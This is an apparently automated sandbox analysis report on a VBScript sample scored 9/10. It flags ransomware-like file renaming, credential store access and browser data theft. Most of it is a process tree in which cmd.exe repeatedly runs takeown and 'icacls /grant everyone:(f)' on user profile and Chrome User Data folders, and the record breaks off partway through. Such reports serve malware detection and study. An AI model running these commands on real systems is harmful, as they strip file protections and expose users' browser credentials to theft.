Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
02/10/2024, 03:09
General
-
Target
target.vbs
-
Size
828B
-
MD5
333ac8009978dfe4bc0e7ea72ad31289
-
SHA1
a8bc098f840e1b0faadb82d1087cf571e979a80d
-
SHA256
087315508cc43b632dae4750608cf107dfd454e2beacb03eeb4b43d013906d3d
-
SHA512
9a3886771f4b12576d9e155077b968b63932689a42e31e2d32642d6a9a46030e2157ea4da58bfddae5a6b37200174a990095e6f9776411a59f8b302fb7a42f9d
Score
9/10
Malware Config
Signatures
-
Renames multiple (869) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Possible privilege escalation attempt 64 IoCs
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\ && icacls C:\Users\ /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\ /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin && icacls C:\Users\Admin /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData && icacls C:\Users\Admin\AppData /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local && icacls C:\Users\Admin\AppData\Local /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe && icacls C:\Users\Admin\AppData\Local\Adobe /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat && icacls C:\Users\Admin\AppData\Local\Adobe\Acrobat /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Acrobat /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0 && icacls C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0 /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache && icacls C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Color && icacls C:\Users\Admin\AppData\Local\Adobe\Color /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Color3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Color /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Color\Profiles && icacls C:\Users\Admin\AppData\Local\Adobe\Color\Profiles /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Color\Profiles3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Color\Profiles /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Application Data && icacls C:\Users\Admin\AppData\Local\Application Data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Application Data3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google && icacls C:\Users\Admin\AppData\Local\Google /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Google /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Google\Chrome /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\467b9bf5-1ebb-4f4a-abc5-b052e8ad1b21 && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\467b9bf5-1ebb-4f4a-abc5-b052e8ad1b21 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\467b9bf5-1ebb-4f4a-abc5-b052e8ad1b213⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB /grant everyone:(f)2⤵
-
